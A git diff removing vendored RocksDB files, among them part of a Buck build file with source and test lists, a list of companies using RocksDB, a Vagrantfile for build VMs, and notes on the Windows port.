-      "db/compaction_iterator.cc",
-      "db/compaction_job.cc",
-      "db/compaction_picker.cc",
-      "db/compaction_picker_universal.cc",
-      "db/convenience.cc",
-      "db/db_filesnapshot.cc",
-      "db/db_impl.cc",
-      "db/db_impl_write.cc",
-      "db/db_impl_compaction_flush.cc",
-      "db/db_impl_files.cc",
-      "db/db_impl_open.cc",
-      "db/db_impl_debug.cc",
-      "db/db_impl_experimental.cc",
-      "db/db_impl_readonly.cc",
-      "db/db_info_dumper.cc",
-      "db/db_iter.cc",
-      "db/dbformat.cc",
-      "db/event_helpers.cc",
-      "db/experimental.cc",
-      "db/external_sst_file_ingestion_job.cc",
-      "db/file_indexer.cc",
-      "db/flush_job.cc",
-      "db/flush_scheduler.cc",
-      "db/forward_iterator.cc",
-      "db/internal_stats.cc",
-      "db/log_reader.cc",
-      "db/log_writer.cc",
-      "db/malloc_stats.cc",
-      "db/managed_iterator.cc",
-      "db/memtable.cc",
-      "db/memtable_list.cc",
-      "db/merge_helper.cc",
-      "db/merge_operator.cc",
-      "db/range_del_aggregator.cc",
-      "db/repair.cc",
-      "db/snapshot_impl.cc",
-      "db/table_cache.cc",
-      "db/table_properties_collector.cc",
-      "db/transaction_log_impl.cc",
-      "db/version_builder.cc",
-      "db/version_edit.cc",
-      "db/version_set.cc",
-      "db/wal_manager.cc",
-      "db/write_batch.cc",
-      "db/write_batch_base.cc",
-      "db/write_controller.cc",
-      "db/write_thread.cc",
-      "env/env.cc",
-      "env/env_chroot.cc",
-      "env/env_encryption.cc",
-      "env/env_hdfs.cc",
-      "env/env_posix.cc",
-      "env/io_posix.cc",
-      "env/mock_env.cc",
-      "memtable/alloc_tracker.cc",
-      "memtable/hash_cuckoo_rep.cc",
-      "memtable/hash_linklist_rep.cc",
-      "memtable/hash_skiplist_rep.cc",
-      "memtable/skiplistrep.cc",
-      "memtable/vectorrep.cc",
-      "memtable/write_buffer_manager.cc",
-      "monitoring/histogram.cc",
-      "monitoring/histogram_windowing.cc",
-      "monitoring/instrumented_mutex.cc",
-      "monitoring/iostats_context.cc",
-      "monitoring/perf_context.cc",
-      "monitoring/perf_level.cc",
-      "monitoring/statistics.cc",
-      "monitoring/thread_status_impl.cc",
-      "monitoring/thread_status_updater.cc",
-      "monitoring/thread_status_updater_debug.cc",
-      "monitoring/thread_status_util.cc",
-      "monitoring/thread_status_util_debug.cc",
-      "options/cf_options.cc",
-      "options/db_options.cc",
-      "options/options.cc",
-      "options/options_helper.cc",
-      "options/options_parser.cc",
-      "options/options_sanity_check.cc",
-      "port/port_posix.cc",
-      "port/stack_trace.cc",
-      "table/adaptive_table_factory.cc",
-      "table/block.cc",
-      "table/block_based_filter_block.cc",
-      "table/block_based_table_builder.cc",
-      "table/block_based_table_factory.cc",
-      "table/block_based_table_reader.cc",
-      "table/block_builder.cc",
-      "table/block_prefix_index.cc",
-      "table/bloom_block.cc",
-      "table/cuckoo_table_builder.cc",
-      "table/cuckoo_table_factory.cc",
-      "table/cuckoo_table_reader.cc",
-      "table/flush_block_policy.cc",
-      "table/format.cc",
-      "table/full_filter_block.cc",
-      "table/get_context.cc",
-      "table/index_builder.cc",
-      "table/iterator.cc",
-      "table/merging_iterator.cc",
-      "table/meta_blocks.cc",
-      "table/partitioned_filter_block.cc",
-      "table/persistent_cache_helper.cc",
-      "table/plain_table_builder.cc",
-      "table/plain_table_factory.cc",
-      "table/plain_table_index.cc",
-      "table/plain_table_key_coding.cc",
-      "table/plain_table_reader.cc",
-      "table/sst_file_writer.cc",
-      "table/table_properties.cc",
-      "table/two_level_iterator.cc",
-      "tools/dump/db_dump_tool.cc",
-      "util/arena.cc",
-      "util/auto_roll_logger.cc",
-      "util/bloom.cc",
-      "util/build_version.cc",
-      "util/coding.cc",
-      "util/compaction_job_stats_impl.cc",
-      "util/comparator.cc",
-      "util/concurrent_arena.cc",
-      "util/crc32c.cc",
-      "util/delete_scheduler.cc",
-      "util/dynamic_bloom.cc",
-      "util/event_logger.cc",
-      "util/file_reader_writer.cc",
-      "util/file_util.cc",
-      "util/filename.cc",
-      "util/filter_policy.cc",
-      "util/hash.cc",
-      "util/log_buffer.cc",
-      "util/murmurhash.cc",
-      "util/random.cc",
-      "util/rate_limiter.cc",
-      "util/slice.cc",
-      "util/sst_file_manager_impl.cc",
-      "util/status.cc",
-      "util/status_message.cc",
-      "util/string_util.cc",
-      "util/sync_point.cc",
-      "util/thread_local.cc",
-      "util/threadpool_imp.cc",
-      "util/transaction_test_util.cc",
-      "util/xxhash.cc",
-      "utilities/backupable/backupable_db.cc",
-      "utilities/blob_db/blob_db.cc",
-      "utilities/blob_db/blob_db_impl.cc",
-      "utilities/blob_db/blob_file.cc",
-      "utilities/blob_db/blob_log_reader.cc",
-      "utilities/blob_db/blob_log_writer.cc",
-      "utilities/blob_db/blob_log_format.cc",
-      "utilities/blob_db/ttl_extractor.cc",
-      "utilities/cassandra/cassandra_compaction_filter.cc",
-      "utilities/cassandra/format.cc",
-      "utilities/cassandra/merge_operator.cc",
-      "utilities/checkpoint/checkpoint_impl.cc",
-      "utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc",
-      "utilities/convenience/info_log_finder.cc",
-      "utilities/date_tiered/date_tiered_db_impl.cc",
-      "utilities/debug.cc",
-      "utilities/document/document_db.cc",
-      "utilities/document/json_document.cc",
-      "utilities/document/json_document_builder.cc",
-      "utilities/env_mirror.cc",
-      "utilities/env_timed.cc",
-      "utilities/geodb/geodb_impl.cc",
-      "utilities/leveldb_options/leveldb_options.cc",
-      "utilities/lua/rocks_lua_compaction_filter.cc",
-      "utilities/memory/memory_util.cc",
-      "utilities/merge_operators/max.cc",
-      "utilities/merge_operators/put.cc",
-      "utilities/merge_operators/string_append/stringappend.cc",
-      "utilities/merge_operators/string_append/stringappend2.cc",
-      "utilities/merge_operators/uint64add.cc",
-      "utilities/option_change_migration/option_change_migration.cc",
-      "utilities/options/options_util.cc",
-      "utilities/persistent_cache/block_cache_tier.cc",
-      "utilities/persistent_cache/block_cache_tier_file.cc",
-      "utilities/persistent_cache/block_cache_tier_metadata.cc",
-      "utilities/persistent_cache/persistent_cache_tier.cc",
-      "utilities/persistent_cache/volatile_tier_impl.cc",
-      "utilities/redis/redis_lists.cc",
-      "utilities/simulator_cache/sim_cache.cc",
-      "utilities/spatialdb/spatial_db.cc",
-      "utilities/table_properties_collectors/compact_on_deletion_collector.cc",
-      "utilities/transactions/optimistic_transaction_db_impl.cc",
-      "utilities/transactions/optimistic_transaction.cc",
-      "utilities/transactions/transaction_base.cc",
-      "utilities/transactions/pessimistic_transaction_db.cc",
-      "utilities/transactions/transaction_db_mutex_impl.cc",
-      "utilities/transactions/pessimistic_transaction.cc",
-      "utilities/transactions/transaction_lock_mgr.cc",
-      "utilities/transactions/transaction_util.cc",
-      "utilities/transactions/write_prepared_txn.cc",
-      "utilities/ttl/db_ttl_impl.cc",
-      "utilities/write_batch_with_index/write_batch_with_index.cc",
-      "utilities/write_batch_with_index/write_batch_with_index_internal.cc",
-      "tools/ldb_cmd.cc",
-      "tools/ldb_tool.cc",
-      "tools/sst_dump_tool.cc",
-      "utilities/blob_db/blob_dump_tool.cc",
-    ],
-    deps = [],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-
-cpp_library(
-    name = "rocksdb_test_lib",
-    headers = AutoHeaders.RECURSIVE_GLOB,
-    srcs = [
-      "table/mock_table.cc",
-      "util/fault_injection_test_env.cc",
-      "util/testharness.cc",
-      "util/testutil.cc",
-      "db/db_test_util.cc",
-      "utilities/cassandra/test_utils.cc",
-      "utilities/col_buf_encoder.cc",
-      "utilities/col_buf_decoder.cc",
-      "utilities/column_aware_encoding_util.cc",
-    ],
-    deps = [":rocksdb_lib"],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-
-cpp_library(
-    name = "rocksdb_tools_lib",
-    headers = AutoHeaders.RECURSIVE_GLOB,
-    srcs = [
-      "tools/db_bench_tool.cc",
-      "util/testutil.cc",
-    ],
-    deps = [":rocksdb_lib"],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-
-cpp_library(
-    name = "env_basic_test_lib",
-    headers = AutoHeaders.RECURSIVE_GLOB,
-    srcs = ["env/env_basic_test.cc"],
-    deps = [":rocksdb_test_lib"],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-
-# [test_name, test_src, test_type]
-ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'],
- ['auto_roll_logger_test', 'util/auto_roll_logger_test.cc', 'serial'],
- ['autovector_test', 'util/autovector_test.cc', 'serial'],
- ['backupable_db_test',
-  'utilities/backupable/backupable_db_test.cc',
-  'parallel'],
- ['blob_db_test', 'utilities/blob_db/blob_db_test.cc', 'serial'],
- ['block_based_filter_block_test',
-  'table/block_based_filter_block_test.cc',
-  'serial'],
- ['block_test', 'table/block_test.cc', 'serial'],
- ['bloom_test', 'util/bloom_test.cc', 'serial'],
- ['c_test', 'db/c_test.c', 'serial'],
- ['cache_test', 'cache/cache_test.cc', 'serial'],
- ['cassandra_format_test',
-  'utilities/cassandra/cassandra_format_test.cc',
-  'serial'],
- ['cassandra_functional_test',
-  'utilities/cassandra/cassandra_functional_test.cc',
-  'serial'],
- ['cassandra_row_merge_test',
-  'utilities/cassandra/cassandra_row_merge_test.cc',
-  'serial'],
- ['cassandra_serialize_test',
-  'utilities/cassandra/cassandra_serialize_test.cc',
-  'serial'],
- ['checkpoint_test', 'utilities/checkpoint/checkpoint_test.cc', 'serial'],
- ['cleanable_test', 'table/cleanable_test.cc', 'serial'],
- ['coding_test', 'util/coding_test.cc', 'serial'],
- ['column_aware_encoding_test',
-  'utilities/column_aware_encoding_test.cc',
-  'serial'],
- ['column_family_test', 'db/column_family_test.cc', 'serial'],
- ['compact_files_test', 'db/compact_files_test.cc', 'serial'],
- ['compact_on_deletion_collector_test',
-  'utilities/table_properties_collectors/compact_on_deletion_collector_test.cc',
-  'serial'],
- ['compaction_iterator_test', 'db/compaction_iterator_test.cc', 'serial'],
- ['compaction_job_stats_test', 'db/compaction_job_stats_test.cc', 'serial'],
- ['compaction_job_test', 'db/compaction_job_test.cc', 'serial'],
- ['compaction_picker_test', 'db/compaction_picker_test.cc', 'serial'],
- ['comparator_db_test', 'db/comparator_db_test.cc', 'serial'],
- ['corruption_test', 'db/corruption_test.cc', 'serial'],
- ['crc32c_test', 'util/crc32c_test.cc', 'serial'],
- ['cuckoo_table_builder_test', 'table/cuckoo_table_builder_test.cc', 'serial'],
- ['cuckoo_table_db_test', 'db/cuckoo_table_db_test.cc', 'serial'],
- ['cuckoo_table_reader_test', 'table/cuckoo_table_reader_test.cc', 'serial'],
- ['date_tiered_test', 'utilities/date_tiered/date_tiered_test.cc', 'serial'],
- ['db_basic_test', 'db/db_basic_test.cc', 'serial'],
- ['db_blob_index_test', 'db/db_blob_index_test.cc', 'serial'],
- ['db_block_cache_test', 'db/db_block_cache_test.cc', 'serial'],
- ['db_bloom_filter_test', 'db/db_bloom_filter_test.cc', 'serial'],
- ['db_compaction_filter_test', 'db/db_compaction_filter_test.cc', 'parallel'],
- ['db_compaction_test', 'db/db_compaction_test.cc', 'parallel'],
- ['db_dynamic_level_test', 'db/db_dynamic_level_test.cc', 'serial'],
- ['db_encryption_test', 'db/db_encryption_test.cc', 'serial'],
- ['db_flush_test', 'db/db_flush_test.cc', 'serial'],
- ['db_inplace_update_test', 'db/db_inplace_update_test.cc', 'serial'],
- ['db_io_failure_test', 'db/db_io_failure_test.cc', 'serial'],
- ['db_iter_test', 'db/db_iter_test.cc', 'serial'],
- ['db_iterator_test', 'db/db_iterator_test.cc', 'serial'],
- ['db_log_iter_test', 'db/db_log_iter_test.cc', 'serial'],
- ['db_memtable_test', 'db/db_memtable_test.cc', 'serial'],
- ['db_merge_operator_test', 'db/db_merge_operator_test.cc', 'serial'],
- ['db_options_test', 'db/db_options_test.cc', 'serial'],
- ['db_properties_test', 'db/db_properties_test.cc', 'serial'],
- ['db_range_del_test', 'db/db_range_del_test.cc', 'serial'],
- ['db_sst_test', 'db/db_sst_test.cc', 'parallel'],
- ['db_statistics_test', 'db/db_statistics_test.cc', 'serial'],
- ['db_table_properties_test', 'db/db_table_properties_test.cc', 'serial'],
- ['db_tailing_iter_test', 'db/db_tailing_iter_test.cc', 'serial'],
- ['db_test', 'db/db_test.cc', 'parallel'],
- ['db_test2', 'db/db_test2.cc', 'serial'],
- ['db_universal_compaction_test',
-  'db/db_universal_compaction_test.cc',
-  'parallel'],
- ['db_wal_test', 'db/db_wal_test.cc', 'parallel'],
- ['db_write_test', 'db/db_write_test.cc', 'serial'],
- ['dbformat_test', 'db/dbformat_test.cc', 'serial'],
- ['delete_scheduler_test', 'util/delete_scheduler_test.cc', 'serial'],
- ['deletefile_test', 'db/deletefile_test.cc', 'serial'],
- ['document_db_test', 'utilities/document/document_db_test.cc', 'serial'],
- ['dynamic_bloom_test', 'util/dynamic_bloom_test.cc', 'serial'],
- ['env_basic_test', 'env/env_basic_test.cc', 'serial'],
- ['env_test', 'env/env_test.cc', 'serial'],
- ['env_timed_test', 'utilities/env_timed_test.cc', 'serial'],
- ['event_logger_test', 'util/event_logger_test.cc', 'serial'],
- ['external_sst_file_basic_test',
-  'db/external_sst_file_basic_test.cc',
-  'serial'],
- ['external_sst_file_test', 'db/external_sst_file_test.cc', 'parallel'],
- ['fault_injection_test', 'db/fault_injection_test.cc', 'parallel'],
- ['file_indexer_test', 'db/file_indexer_test.cc', 'serial'],
- ['file_reader_writer_test', 'util/file_reader_writer_test.cc', 'serial'],
- ['filelock_test', 'util/filelock_test.cc', 'serial'],
- ['filename_test', 'db/filename_test.cc', 'serial'],
- ['flush_job_test', 'db/flush_job_test.cc', 'serial'],
- ['full_filter_block_test', 'table/full_filter_block_test.cc', 'serial'],
- ['geodb_test', 'utilities/geodb/geodb_test.cc', 'serial'],
- ['hash_table_test',
-  'utilities/persistent_cache/hash_table_test.cc',
-  'serial'],
- ['hash_test', 'util/hash_test.cc', 'serial'],
- ['heap_test', 'util/heap_test.cc', 'serial'],
- ['histogram_test', 'monitoring/histogram_test.cc', 'serial'],
- ['inlineskiplist_test', 'memtable/inlineskiplist_test.cc', 'parallel'],
- ['iostats_context_test', 'monitoring/iostats_context_test.cc', 'serial'],
- ['json_document_test', 'utilities/document/json_document_test.cc', 'serial'],
- ['ldb_cmd_test', 'tools/ldb_cmd_test.cc', 'serial'],
- ['listener_test', 'db/listener_test.cc', 'serial'],
- ['log_test', 'db/log_test.cc', 'serial'],
- ['lru_cache_test', 'cache/lru_cache_test.cc', 'serial'],
- ['manual_compaction_test', 'db/manual_compaction_test.cc', 'parallel'],
- ['memory_test', 'utilities/memory/memory_test.cc', 'serial'],
- ['memtable_list_test', 'db/memtable_list_test.cc', 'serial'],
- ['merge_helper_test', 'db/merge_helper_test.cc', 'serial'],
- ['merge_test', 'db/merge_test.cc', 'serial'],
- ['merger_test', 'table/merger_test.cc', 'serial'],
- ['mock_env_test', 'env/mock_env_test.cc', 'serial'],
- ['object_registry_test', 'utilities/object_registry_test.cc', 'serial'],
- ['optimistic_transaction_test',
-  'utilities/transactions/optimistic_transaction_test.cc',
-  'serial'],
- ['option_change_migration_test',
-  'utilities/option_change_migration/option_change_migration_test.cc',
-  'serial'],
- ['options_file_test', 'db/options_file_test.cc', 'serial'],
- ['options_settable_test', 'options/options_settable_test.cc', 'serial'],
- ['options_test', 'options/options_test.cc', 'serial'],
- ['options_util_test', 'utilities/options/options_util_test.cc', 'serial'],
- ['partitioned_filter_block_test',
-  'table/partitioned_filter_block_test.cc',
-  'serial'],
- ['perf_context_test', 'db/perf_context_test.cc', 'serial'],
- ['persistent_cache_test',
-  'utilities/persistent_cache/persistent_cache_test.cc',
-  'parallel'],
- ['plain_table_db_test', 'db/plain_table_db_test.cc', 'serial'],
- ['prefix_test', 'db/prefix_test.cc', 'serial'],
- ['range_del_aggregator_test', 'db/range_del_aggregator_test.cc', 'serial'],
- ['rate_limiter_test', 'util/rate_limiter_test.cc', 'serial'],
- ['reduce_levels_test', 'tools/reduce_levels_test.cc', 'serial'],
- ['repair_test', 'db/repair_test.cc', 'serial'],
- ['sim_cache_test', 'utilities/simulator_cache/sim_cache_test.cc', 'serial'],
- ['skiplist_test', 'memtable/skiplist_test.cc', 'serial'],
- ['slice_transform_test', 'util/slice_transform_test.cc', 'serial'],
- ['spatial_db_test', 'utilities/spatialdb/spatial_db_test.cc', 'serial'],
- ['sst_dump_test', 'tools/sst_dump_test.cc', 'serial'],
- ['statistics_test', 'monitoring/statistics_test.cc', 'serial'],
- ['stringappend_test',
-  'utilities/merge_operators/string_append/stringappend_test.cc',
-  'serial'],
- ['table_properties_collector_test',
-  'db/table_properties_collector_test.cc',
-  'serial'],
- ['table_test', 'table/table_test.cc', 'parallel'],
- ['thread_list_test', 'util/thread_list_test.cc', 'serial'],
- ['thread_local_test', 'util/thread_local_test.cc', 'serial'],
- ['timer_queue_test', 'util/timer_queue_test.cc', 'serial'],
- ['transaction_test', 'utilities/transactions/transaction_test.cc', 'serial'],
- ['ttl_test', 'utilities/ttl/ttl_test.cc', 'serial'],
- ['util_merge_operators_test',
-  'utilities/util_merge_operators_test.cc',
-  'serial'],
- ['version_builder_test', 'db/version_builder_test.cc', 'serial'],
- ['version_edit_test', 'db/version_edit_test.cc', 'serial'],
- ['version_set_test', 'db/version_set_test.cc', 'serial'],
- ['wal_manager_test', 'db/wal_manager_test.cc', 'serial'],
- ['write_batch_test', 'db/write_batch_test.cc', 'serial'],
- ['write_batch_with_index_test',
-  'utilities/write_batch_with_index/write_batch_with_index_test.cc',
-  'serial'],
- ['write_buffer_manager_test',
-  'memtable/write_buffer_manager_test.cc',
-  'serial'],
- ['write_callback_test', 'db/write_callback_test.cc', 'serial'],
- ['write_controller_test', 'db/write_controller_test.cc', 'serial']]
-
-
-# Generate a test rule for each entry in ROCKS_TESTS
-for test_cfg in ROCKS_TESTS:
-    test_name = test_cfg[0]
-    test_cc = test_cfg[1]
-    ttype = "gtest" if test_cfg[2] == "parallel" else "simple"
-    test_bin = test_name + "_bin"
-
-    cpp_binary (
-      name = test_bin,
-      srcs = [test_cc],
-      deps = [":rocksdb_test_lib"],
-      preprocessor_flags = rocksdb_preprocessor_flags,
-      arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-      compiler_flags = rocksdb_compiler_flags,
-      external_deps = rocksdb_external_deps,
-    )
-
-    custom_unittest(
-      name = test_name,
-      type = ttype,
-      deps = [":" + test_bin],
-      command = [TEST_RUNNER, BUCK_BINS + test_bin]
-    )
-
-custom_unittest(
-    name = "make_rocksdbjavastatic",
-    type = "simple",
-    command = ["internal_repo_rocksdb/make_rocksdbjavastatic.sh"],
-)
-
-custom_unittest(
-    name = "make_rocksdb_lite_release",
-    type = "simple",
-    command = ["internal_repo_rocksdb/make_rocksdb_lite_release.sh"],
-)
diff --git a/thirdparty/rocksdb/USERS.md b/thirdparty/rocksdb/USERS.md
deleted file mode 100644
index 7be093f..0000000
--- a/thirdparty/rocksdb/USERS.md
+++ /dev/null
@@ -1,85 +0,0 @@
-This document lists users of RocksDB and their use cases. If you are using RocksDB, please open a pull request and add yourself to the list.
-
-## Facebook
-At Facebook, we use RocksDB as storage engines in multiple data management services and a backend for many different stateful services, including:
-
-1. MyRocks -- https://github.com/MySQLOnRocksDB/mysql-5.6
-2. MongoRocks -- https://github.com/mongodb-partners/mongo-rocks
-3. ZippyDB --  Facebook's distributed key-value store with Paxos-style replication, built on top of RocksDB.[*] https://www.youtube.com/watch?v=DfiN7pG0D0khtt
-4. Laser -- Laser is a high query throughput, low (millisecond) latency, key-value storage service built on top of RocksDB.[*]
-4. Dragon -- a distributed graph query engine. https://code.facebook.com/posts/1737605303120405/dragon-a-distributed-graph-query-engine/
-5. Stylus -- a low-level stream processing framework writtenin C++.[*]
-
-[*] https://research.facebook.com/publications/realtime-data-processing-at-facebook/
-
-## LinkedIn
-Two different use cases at Linkedin are using RocksDB as a storage engine:
-
-1. LinkedIn's follow feed for storing user's activities. Check out the blog post: https://engineering.linkedin.com/blog/2016/03/followfeed--linkedin-s-feed-made-faster-and-smarter
-2. Apache Samza, open source framework for stream processing
-
-Learn more about those use cases in a Tech Talk by Ankit Gupta and Naveen Somasundaram: http://www.youtube.com/watch?v=plqVp_OnSzg
-
-## Yahoo
-Yahoo is using RocksDB as a storage engine for their biggest distributed data store Sherpa. Learn more about it here: http://yahooeng.tumblr.com/post/120730204806/sherpa-scales-new-heights
-
-## CockroachDB
-CockroachDB is an open-source geo-replicated transactional database (still in development). They are using RocksDB as their storage engine. Check out their github: https://github.com/cockroachdb/cockroach
-
-## DNANexus
-DNANexus is using RocksDB to speed up processing of genomics data.
-You can learn more from this great blog post by Mike Lin: http://devblog.dnanexus.com/faster-bam-sorting-with-samtools-and-rocksdb/
-
-## Iron.io
-Iron.io is using RocksDB as a storage engine for their distributed queueing system.
-Learn more from Tech Talk by Reed Allman: http://www.youtube.com/watch?v=HTjt6oj-RL4
-
-## Tango Me
-Tango is using RocksDB as a graph storage to store all users' connection data and other social activity data.
-
-## Turn
-Turn is using RocksDB as a storage layer for their key/value store, serving at peak 2.4MM QPS out of different datacenters.
-Check out our RocksDB Protobuf merge operator at: https://github.com/vladb38/rocksdb_protobuf
-
-## Santanader UK/Cloudera Profession Services
-Check out their blog post: http://blog.cloudera.com/blog/2015/08/inside-santanders-near-real-time-data-ingest-architecture/
-
-## Airbnb
-Airbnb is using RocksDB as a storage engine for their personalized search service. You can learn more about it here: https://www.youtube.com/watch?v=ASQ6XMtogMs
-
-## Pinterest
-Pinterest's Object Retrieval System uses RocksDB for storage: https://www.youtube.com/watch?v=MtFEVEs_2Vo
-
-## Smyte
-[Smyte](https://www.smyte.com/) uses RocksDB as the storage layer for their core key-value storage, high-performance counters and time-windowed HyperLogLog services.
-
-## Rakuten Marketing
-[Rakuten Marketing](https://marketing.rakuten.com/) uses RocksDB as the disk cache layer for the real-time bidding service in their Performance DSP.
-
-## VWO, Wingify
-[VWO's](https://vwo.com/) Smart Code checker and URL helper uses RocksDB to store all the URLs where VWO's Smart Code is installed.
-
-## quasardb
-[quasardb](https://www.quasardb.net) is a high-performance, distributed, transactional key-value database that integrates well with in-memory analytics engines such as Apache Spark. 
-quasardb uses a heavily tuned RocksDB as its persistence layer.
-
-## Netflix
-[Netflix](http://techblog.netflix.com/2016/05/application-data-caching-using-ssds.html) Netflix uses RocksDB on AWS EC2 instances with local SSD drives to cache application data.
-
-## TiKV
-[TiKV](https://github.com/pingcap/tikv) is a GEO-replicated, high-performance, distributed, transactional key-value database. TiKV is powered by Rust and Raft. TiKV uses RocksDB as its persistence layer.
-
-## Apache Flink
-[Apache Flink](https://flink.apache.org/news/2016/03/08/release-1.0.0.html) uses RocksDB to store state locally on a machine.
-
-## Dgraph
-[Dgraph](https://github.com/dgraph-io/dgraph) is an open-source, scalable, distributed, low latency, high throughput Graph database .They use RocksDB to store state locally on a machine.
-
-## Uber
-[Uber](http://eng.uber.com/cherami/) uses RocksDB as a durable and scalable task queue.
-
-## 360 Pika
-[360](http://www.360.cn/) [Pika](https://github.com/Qihoo360/pika) is a nosql compatible with redis. With the huge amount of data stored, redis may suffer for a capacity bottleneck, and pika was born for solving it. It has widely been widely used in many company
-
-## LzLabs
-LzLabs is using RocksDB as a storage engine in their multi-database distributed framework to store application configuration and user data.
diff --git a/thirdparty/rocksdb/Vagrantfile b/thirdparty/rocksdb/Vagrantfile
deleted file mode 100644
index d7c2991..0000000
--- a/thirdparty/rocksdb/Vagrantfile
+++ /dev/null
@@ -1,34 +0,0 @@
-# Vagrant file
-Vagrant.configure("2") do |config|
-
-  config.vm.provider "virtualbox" do |v|
-    v.memory = 4096
-    v.cpus = 2
-  end
-
-  config.vm.define "ubuntu14" do |box|
-    box.vm.box = "ubuntu/trusty64"
-  end
-
-  config.vm.define "centos65" do |box|
-    box.vm.box = "chef/centos-6.5"
-  end
-
-  config.vm.define "FreeBSD10" do |box|
-    box.vm.guest = :freebsd
-    box.vm.box = "robin/freebsd-10"
-    # FreeBSD does not support 'mount_virtualbox_shared_folder', use NFS
-    box.vm.synced_folder ".", "/vagrant", :nfs => true, id: "vagrant-root"
-    box.vm.network "private_network", ip: "10.0.1.10"
-
-    # build everything after creating VM, skip using --no-provision
-    box.vm.provision "shell", inline: <<-SCRIPT
-      pkg install -y gmake clang35
-      export CXX=/usr/local/bin/clang++35
-      cd /vagrant
-      gmake clean
-      gmake all OPT=-g
-    SCRIPT
-  end
-
-end
diff --git a/thirdparty/rocksdb/WINDOWS_PORT.md b/thirdparty/rocksdb/WINDOWS_PORT.md
deleted file mode 100644
index a0fe1fe..0000000
--- a/thirdparty/rocksdb/WINDOWS_PORT.md
+++ /dev/null
@@ -1,228 +0,0 @@
-# Microsoft Contribution Notes
-
-## Contributors
-* Alexander Zinoviev https://github.com/zinoale
-* Dmitri Smirnov https://github.com/yuslepukhin
-* Praveen Rao  https://github.com/PraveenSinghRao
-* Sherlock Huang  https://github.com/SherlockNoMad
-
-## Introduction
-RocksDB is a well proven open source key-value persistent store, optimized for fast storage. It provides scalability with number of CPUs and storage IOPS, to support IO-bound, in-memory and write-once workloads, most importantly, to be flexible to allow for innovation.
-
-As Microsoft Bing team we have been continuously pushing hard to improve the scalability, efficiency of platform and eventually benefit Bing end-user satisfaction.  We would like to explore the opportunity to embrace open source, RocksDB here, to use, enhance and customize for our usage, and also contribute back to the RocksDB community. Herein, we are pleased to offer this RocksDB port for Windows platform.
-
-These notes describe some decisions and changes we had to make with regards to porting RocksDB on Windows. We hope this will help both reviewers and users of the Windows port.
-We are open for comments and improvements.
-
-## OS specifics
-All of the porting, testing and benchmarking was done on Windows Server 2012 R2 Datacenter 64-bit but to the best of our knowledge there is not a specific API we used during porting that is unsupported on other Windows OS after Vista.
-
-## Porting goals
-We strive to achieve the following goals:
-* make use of the existing porting interface of RocksDB
-* make minimum [WY2]modifications within platform independent code.
-* make all unit test pass both in debug and release builds. 
-  * Note: latest introduction of SyncPoint seems to disable running db_test in Release.
-* make performance on par with published benchmarks accounting for HW differences
-* we would like to keep the port code inline with the master branch with no forking
-
-## Build system
-We have chosen CMake as a widely accepted build system to build the Windows port. It is very fast and convenient. 
-
-At the same time it generates Visual Studio projects that are both usable from a command line and IDE.
-
-The top-level CMakeLists.txt file contains description of all targets and build rules. It also provides brief instructions on how to build the software for Windows. One more build related file is thirdparty.inc that also resides on the top level. This file must be edited to point to actual third party libraries location.
-We think that it would be beneficial to merge the existing make-based build system and the new cmake-based build system into a single one to use on all platforms.
-
-All building and testing was done for 64-bit. We have not conducted any testing for 32-bit and early reports indicate that it will not run on 32-bit.
-
-## C++ and STL notes
-We had to make some minimum changes within the portable files that either account for OS differences or the shortcomings of C++11 support in the current version of the MS compiler. Most or all of them are expected to be fixed in the upcoming compiler releases.
-
-We plan to use this port for our business purposes here at Bing and this provided business justification for this port. This also means, we do not have at present to choose the compiler version at will.
-
-* Certain headers that are not present and not necessary on Windows were simply `#ifndef OS_WIN` in a few places (`unistd.h`)
-* All posix specific headers were replaced to port/port.h which worked well
-* Replaced `dirent.h` for `port/dirent.h` (very few places) with the implementation of the relevant interfaces within `rocksdb::port` namespace
-* Replaced `sys/time.h` to `port/sys_time.h` (few places) implemented equivalents within `rocksdb::port`
-* `printf %z` specification is not supported on Windows. To imitate existing standards we came up with a string macro `ROCKSDB_PRIszt` which expands to `%z` on posix systems and to Iu on windows.
-* in class member initialization were moved to a __ctors in some cases
-* `constexpr` is not supported. We had to replace `std::numeric_limits<>::max/min()` to its C macros for constants. Sometimes we had to make class members `static const` and place a definition within a .cc file.
-* `constexpr` for functions was replaced to a template specialization (1 place)
-* Union members that have non-trivial constructors were replaced to `char[]` in one place along with bug fixes (spatial experimental feature)
-* Zero-sized arrays are deemed a non-standard extension which we converted to 1 size array and that should work well for the purposes of these classes.
-* `std::chrono` lacks nanoseconds support (fixed in the upcoming release of the STL) and we had to use `QueryPerfCounter()` within env_win.cc
-* Function local statics initialization is still not safe. Used `std::once` to mitigate within WinEnv.
-
-## Windows Environments notes
-We endeavored to make it functionally on par with posix_env. This means we replicated the functionality of the thread pool and other things as precise as possible, including:
-* Replicate posix logic using std:thread primitives.
-* Implement all posix_env disk access functionality.
-* Set `use_os_buffer=false` to disable OS disk buffering for WinWritableFile and WinRandomAccessFile.
-* Replace `pread/pwrite` with `WriteFile/ReadFile` with `OVERLAPPED` structure.
-* Use `SetFileInformationByHandle` to compensate absence of `fallocate`.
-
-### In detail
-Even though Windows provides its own efficient thread-pool implementation we chose to replicate posix logic using `std::thread` primitives. This allows anyone to quickly detect any changes within the posix source code and replicate them within windows env. This has proven to work very well. At the same time for anyone who wishes to replace the built-in thread-pool can do so using RocksDB stackable environments.
-
-For disk access we implemented all of the functionality present within the posix_env which includes memory mapped files, random access, rate-limiter support etc.
